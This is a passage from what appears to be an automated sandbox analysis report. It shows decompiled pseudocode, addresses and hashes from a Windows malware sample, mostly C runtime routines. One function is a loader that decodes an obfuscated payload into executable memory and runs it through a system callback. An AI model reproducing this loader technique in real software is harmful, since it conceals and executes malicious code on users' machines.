											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E003B2873(_t119)); // executed
											_t88 = E003B2A2A(); // executed
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E003B2897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E003B1CC3())) = 0x16;
				goto L4;
			}




























                    0x003b12c6
                    0x003b12c9
                    0x003b12cf
                    0x003b12d2
                    0x003b12d5
                    0x003b12f2
                    0x00000000
                    0x003b12f2
                    0x003b12d7
                    0x003b12dc
                    0x00000000
                    0x00000000
                    0x003b12e0
                    0x003b12fb
                    0x003b12fe
                    0x003b1300
                    0x003b130e
                    0x003b130e
                    0x003b1312
                    0x003b131a
                    0x003b131f
                    0x003b131f
                    0x003b1322
                    0x003b1324
                    0x00000000
                    0x003b1326
                    0x003b1326
                    0x003b132e
                    0x003b1330
                    0x00000000
                    0x00000000
                    0x003b1332
                    0x003b1335
                    0x003b1338
                    0x003b133f
                    0x003b1341
                    0x003b1348
                    0x003b1343
                    0x003b1343
                    0x003b1343
                    0x003b134d
                    0x003b1350
                    0x003b1352
                    0x003b143b
                    0x00000000
                    0x003b1358
                    0x003b1358
                    0x003b1358
                    0x003b135f
                    0x003b13a0
                    0x003b13a0
                    0x003b13a2
                    0x003b140d
                    0x003b1413
                    0x003b1416
                    0x003b146d
                    0x00000000
                    0x003b1473
                    0x003b1418
                    0x003b141b
                    0x003b141d
                    0x003b1443
                    0x003b1443
                    0x003b1447
                    0x003b1451
                    0x003b1456
                    0x003b145e
                    0x003b12ed
                    0x003b12ed
                    0x00000000
                    0x003b12ed
                    0x003b141f
                    0x003b1422
                    0x003b1425
                    0x003b1426
                    0x003b1429
                    0x003b1429
                    0x003b142a
                    0x003b142d
                    0x003b1430
                    0x00000000
                    0x003b1430
                    0x003b13a4
                    0x003b13a6
                    0x003b13ca
                    0x003b13cf
                    0x003b13d5
                    0x003b13d7
                    0x003b13d7
                    0x003b13a8
                    0x003b13aa
                    0x003b13b0
                    0x003b13c2
                    0x003b13c2
                    0x003b13c2
                    0x003b13c4
                    0x003b13b2
                    0x003b13b7
                    0x003b13b9
                    0x003b13b9
                    0x003b13c6
                    0x003b13c6
                    0x003b13d9
                    0x003b13dc
                    0x00000000
                    0x003b13de
                    0x003b13de
                    0x003b13df
                    0x003b13e9
                    0x003b13ea
                    0x003b13ef
                    0x003b13f2
                    0x003b13f4
                    0x003b147b
                    0x00000000
                    0x003b147b
                    0x003b13fa
                    0x003b13fd
                    0x003b1469
                    0x003b1469
                    0x003b1469
                    0x003b1469
                    0x00000000
                    0x003b1469
                    0x003b13ff
                    0x003b13ff
                    0x003b1401
                    0x003b1401
                    0x003b1404
                    0x003b1407
                    0x00000000
                    0x003b1407
                    0x003b13dc
                    0x003b1361
                    0x003b1364
                    0x003b1367
                    0x003b1369
                    0x00000000
                    0x00000000
                    0x003b136b
                    0x00000000
                    0x00000000
                    0x003b1371
                    0x003b1373
                    0x003b1375
                    0x003b1377
                    0x003b1377
                    0x003b137a
                    0x003b137d
                    0x003b137f
                    0x00000000
                    0x003b1385
                    0x003b138c
                    0x003b1391
                    0x003b1394
                    0x003b1397
                    0x003b139a
                    0x003b139c
                    0x00000000
                    0x003b139c
                    0x003b1433
                    0x003b1433
                    0x003b1433
                    0x00000000
                    0x003b1358
                    0x003b1352
                    0x003b1324
                    0x003b1307
                    0x003b130a
                    0x003b130c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x003b130c
                    0x003b12e2
                    0x003b12e7
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                    • Instruction ID: 60d99b197231ce0c934cab5f082d7614c7c2df8dd9c24c669e9a0f134f01371b
                    • Opcode Fuzzy Hash: 59fc80b96fffc72afd815ad67ce1625b61f32b5ac41ee5beda371c02a2359130
                    • Instruction Fuzzy Hash: F251DC34A00305DBDB268F69D8A06DE77F5AF41328FA48729FA29C6DD0E770DE509B40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B1000 Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E003B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t20;
				_Unknown_base(*)()* _t21;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t34;

				_push(_t20);
				_t28 = 0; // executed
				_t6 = E003B114B(_t20, _t26, 0, 0x17d78400); // executed
				 *_t34 = 0x3c3000;
				_v8 = _t6;
				_t7 = E003B11DD(_a12, _t27); // executed
				_t8 = VirtualAlloc(0, 0x1466, 0x3000, 0x40); // executed
				_t21 = _t8;
				E003B1481(_t21, 0x1466, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E003B1530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t21 + _t28)) = (( *((intOrPtr*)(_t21 + _t28)) + 0x0000006f ^ 0x00000059) + 0x0000000b ^ 0x00000054) - 0x17;
						_t28 = _t28 + 1;
					} while (_t28 < 0x1466);
					EnumSystemCodePagesW(_t21, 0); // executed
				}
				return 0;
			}















                    0x003b1004
                    0x003b100c
                    0x003b100e
                    0x003b1013
                    0x003b101d
                    0x003b1020
                    0x003b1036
                    0x003b1044
                    0x003b1048
                    0x003b104d
                    0x003b1055
                    0x003b1062
                    0x003b106a
                    0x003b1077
                    0x003b107a
                    0x003b107b
                    0x003b1082
                    0x003b1082
                    0x003b108e

                    APIs
                    • _malloc.LIBCMT ref: 003B100E
                      • Part of subcall function 003B114B: __FF_MSGBANNER.LIBCMT ref: 003B1162
                      • Part of subcall function 003B114B: __NMSG_WRITE.LIBCMT ref: 003B1169
                      • Part of subcall function 003B114B: RtlAllocateHeap.NTDLL(00870000,00000000,00000001,00000000,00000000,00000000,?,003B48C7,00000000,00000000,00000000,00000000,?,003B44F9,00000018,003C2280), ref: 003B118E
                      • Part of subcall function 003B11DD: __wfsopen.LIBCMT ref: 003B11E8
                    • VirtualAlloc.KERNELBASE(00000000,00001466,00003000,00000040), ref: 003B1036
                    • __fread_nolock.LIBCMT ref: 003B1048
                    • _memset.LIBCMT ref: 003B1062
                    • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 003B1082
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                    • String ID:
                    • API String ID: 3693343133-0
                    • Opcode ID: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction ID: 2e38a4303b32ce40cae24b4c862d45957ad6e53e4632fe16628bc61f9f3e880a
                    • Opcode Fuzzy Hash: 37371f273f8dc7605030bbac49bd6b5808be28ce69042ed104c1ac73dbfc66fb
                    • Instruction Fuzzy Hash: E30147729053447BE722277A9C4BFDB3B5CCB52B5CF500425FB019A182E5E499029274
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B149C Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 89%
                    			E003B149C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x3c2170);
				E003B2400(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E003B1F5E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E003B12BC( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E003B1525(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E003B1530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E003B1CC3())) = 0x16;
						E003B1E89();
						goto L6;
					}
				}
				return E003B2445(_t16);
			}







                    0x003b149c
                    0x003b149e
                    0x003b14a3
                    0x003b14aa
                    0x003b14b0
                    0x003b14e3
                    0x003b14e3
                    0x003b14b7
                    0x003b14b7
                    0x003b14bc
                    0x003b14ec
                    0x003b14f2
                    0x003b1502
                    0x003b150a
                    0x003b150c
                    0x003b150f
                    0x003b1516
                    0x003b151b
                    0x003b14be
                    0x003b14c2
                    0x003b14cb
                    0x003b14d0
                    0x003b14d8
                    0x003b14de
                    0x00000000
                    0x003b14de
                    0x003b14bc
                    0x003b14ea

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: 8c878f4f9c9f35adbf50a8d9e8ad9ebeee2bc4b1e957c72052971bc39ea182dc
                    • Instruction ID: 9d33451bf09b12cad72a9db07b987406fd7c6ff06fc7171f641f76b270850b1a
                    • Opcode Fuzzy Hash: 8c878f4f9c9f35adbf50a8d9e8ad9ebeee2bc4b1e957c72052971bc39ea182dc
                    • Instruction Fuzzy Hash: 93018432C00208ABCF33AFA69C119DF7B71AF81328F958215FA245E951D7718A21DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B11DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 3b11dd-3b11f1 call 3b11f2
                    C-Code - Quality: 25%
                    			E003B11DD(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E003B11F2(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                    0x003b11e0
                    0x003b11e2
                    0x003b11e5
                    0x003b11e8
                    0x003b11f1

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: d40fe278819c9d050694ecddcc298a92bf324943cea261ed9c5f7f1d0bd8af15
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: FFB0927244020C77CE022E86EC02A893B1A9B50664F408020FB0C1C572E677E6609689
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 003B43CC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E003B43CC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                    0x003b43d1
                    0x003b43e1

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,003B1E2A,?,?,?,00000000), ref: 003B43D1
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 003B43DA
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 08418ae5db77c559e0f84f281c482436e9388cf38eb12659eb179015562eca3c
                    • Instruction ID: 2a42186ae954fc9d999b17c08ebe5fa97ecb9dc2a8a6c5fdfe06364631d55fb1
                    • Opcode Fuzzy Hash: 08418ae5db77c559e0f84f281c482436e9388cf38eb12659eb179015562eca3c
                    • Instruction Fuzzy Hash: F8B09235044208ABCB022B9EEC0DB883F2CEB1475BF100510F70E440628B7254108A92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B439B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E003B439B(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                    0x003b43a8

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?,?,003B3447,003B33FC), ref: 003B43A1
                    Memory Dump Source
                    • Source File: 00000001.00000002.251200158.00000000003B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000001.00000002.251158587.00000000003B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251217446.00000000003BE000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251229214.00000000003C3000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.251235482.00000000003C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3b0000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 769703844c0e1a70e3235236ce1297fdf25ad1c011a3a0196850e33c7da7c855
                    • Instruction ID: 41ee425042cf93f0ec001a8972fe2df1406408a57c33c597c4a20f9d3d98810e
                    • Opcode Fuzzy Hash: 769703844c0e1a70e3235236ce1297fdf25ad1c011a3a0196850e33c7da7c855
                    • Instruction Fuzzy Hash: 51A0113000020CAB8A022B8AEC088883F2CEA002AAB000020FA0C000228B32A8208A82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003B38A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E003B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x3c2260);
				E003B2400(__ebx, __edi, __esi);
				E003B442F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E003B4869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x3c4848 = _t82;
					 *0x3c50e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x3c4848; // 0x8963c8
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0x3c4848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x3c6100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -3950652
											E003B40A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E003B3B53();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E003B2445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0x3c50e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E003B4869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0x3c4848[_t149] = _t138;
							 *0x3c50e4 =  *0x3c50e4 + _t141;
							__eflags =  *0x3c50e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0x3c4848[_t149];
								if(_t138 >= 0x800 + 0x3c4848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x3c50e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0x3c4848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E003B40A2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E003B2600(_t155, 0x3c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                    0x003b38a8
                    0x003b38aa
                    0x003b38af
                    0x003b38b6
                    0x003b38be
                    0x003b38c1
                    0x003b38c5
                    0x003b38c6
                    0x003b38c7
                    0x003b38ce
                    0x003b38d0
                    0x003b38d5
                    0x003b38f2
                    0x003b38f7
                    0x003b38fd
                    0x003b3902
                    0x003b3904
                    0x00000000
                    0x00000000
                    0x003b3906
                    0x003b390c
                    0x003b390f
                    0x003b3912
                    0x003b391b
                    0x003b391e
                    0x003b3924
                    0x003b3927
                    0x003b392a
                    0x003b392d
                    0x003b3930
                    0x003b3930
                    0x003b393b
                    0x003b3941
                    0x003b3946
                    0x003b3a7b
                    0x003b3a7d
                    0x003b3a7e
                    0x003b3a7e
                    0x003b3a7e
                    0x003b3a80
                    0x003b3a80
                    0x003b3a83
                    0x003b3a86
                    0x00000000
                    0x00000000
                    0x003b3a91
                    0x003b3a97
                    0x003b3a9a
                    0x003b3a9d
                    0x003b3ab1
                    0x003b3ab1
                    0x003b3ab5
                    0x003b3ab7
                    0x003b3abe
                    0x003b3ac3
                    0x003b3ac5
                    0x003b3ac5
                    0x003b3ab9
                    0x003b3abb
                    0x003b3abb
                    0x003b3ac9
                    0x003b3acf
                    0x003b3ad2
                    0x003b3ad5
                    0x003b3b23
                    0x003b3b29
                    0x003b3b2c
                    0x003b3b2e
                    0x003b3b33
                    0x003b3b35
                    0x003b3b3a
                    0x003b3b3a
                    0x00000000
                    0x003b3ad7
                    0x003b3ad7
                    0x003b3ad9
                    0x00000000
                    0x00000000
                    0x003b3adc
                    0x003b3ae2
                    0x003b3ae4
                    0x00000000
                    0x00000000
                    0x003b3ae9
                    0x003b3aeb
                    0x003b3af0
                    0x003b3af3
                    0x003b3afd
                    0x003b3b00
                    0x003b3b0b
                    0x003b3b12
                    0x003b3b16
                    0x003b3b1b
                    0x003b3b1e
                    0x003b3b3d
                    0x003b3b3d
                    0x00000000
                    0x003b3b3d
                    0x003b3b06
                    0x003b3b06
                    0x003b3b08
                    0x003b3b08
                    0x00000000
                    0x003b3b08
                    0x003b3af9
                    0x00000000
                    0x003b3af9
                    0x003b3ad5
                    0x003b3a9f
                    0x003b3aa1
                    0x00000000
                    0x00000000
